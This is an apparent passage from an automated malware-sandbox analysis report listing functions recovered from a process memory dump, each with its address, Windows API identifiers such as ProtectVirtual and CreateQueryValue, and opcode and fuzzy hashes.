                                                                                  Function 000001E7A4355028, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: f9bae9e0bdd93042823327556d740cc65595436eca48a2376daa81d9f037e0d9
                                                                                  • Instruction ID: 34f5246797fa84b99d53cb5dafc71dfe4db62234eecbc8ce004e73b6a06dfba0
                                                                                  • Opcode Fuzzy Hash: f9bae9e0bdd93042823327556d740cc65595436eca48a2376daa81d9f037e0d9
                                                                                  • Instruction Fuzzy Hash: 2661863051DE459FF794EF18D8856ADB7E0FBA8301F54452EE84AD32A5EB35F8408B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A433D7E0, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: a17af73f97df0c82a43e7586eb3227405641a4301284392d55f929c14e1347f6
                                                                                  • Instruction ID: 87a48ad116476a4863ffbd4c087e89b5dd85ab0fd3596349183698cec826474f
                                                                                  • Opcode Fuzzy Hash: a17af73f97df0c82a43e7586eb3227405641a4301284392d55f929c14e1347f6
                                                                                  • Instruction Fuzzy Hash: EC11D33060CB0D8FAB18EF29E845569B3E5E798315F14063DEC8BC3285EA34ED458B86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4346734, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2711935003-0
                                                                                  • Opcode ID: 77cdeb7ec160b55a16230e76a1ab5e2e70236efd872a38e31f31aa2abee85eba
                                                                                  • Instruction ID: 75a14049d41a7e9f7e663bfe330f1b520b1eecb83d16d83d774797e28f3b0e6d
                                                                                  • Opcode Fuzzy Hash: 77cdeb7ec160b55a16230e76a1ab5e2e70236efd872a38e31f31aa2abee85eba
                                                                                  • Instruction Fuzzy Hash: E6214F3011CB888FF750EF65D844B9EB7E0FBD8305F500929A88AD3291EB78D545CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A435D0A4, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: e809e0a73d4204c7adabfcf8fa1b5ba3f669599cca068ab71fd695eab82b94b0
                                                                                  • Instruction ID: a8ba6c63720aea5d89ae609aa20033c0c8a47137e186547a38ee78802e33f989
                                                                                  • Opcode Fuzzy Hash: e809e0a73d4204c7adabfcf8fa1b5ba3f669599cca068ab71fd695eab82b94b0
                                                                                  • Instruction Fuzzy Hash: 42F03C31318B4A4FFB88DB69D484B6EB6E1EBD8302F44593DB94AC3290DB78C8054B02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A433386C, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: lstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1534048567-0
                                                                                  • Opcode ID: cda7ee15d0ed800f6432580e816866debd22be49963250a16eccd940d9f44358
                                                                                  • Instruction ID: e77ec8d129e6b55ad9d8625dabd412a62a58e0d8bd95fb97427cf6e415d2b1d5
                                                                                  • Opcode Fuzzy Hash: cda7ee15d0ed800f6432580e816866debd22be49963250a16eccd940d9f44358
                                                                                  • Instruction Fuzzy Hash: B971933061CB859BE768CF08C48166EB7E1FBD8715F14556DE88A93291DB31E846CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions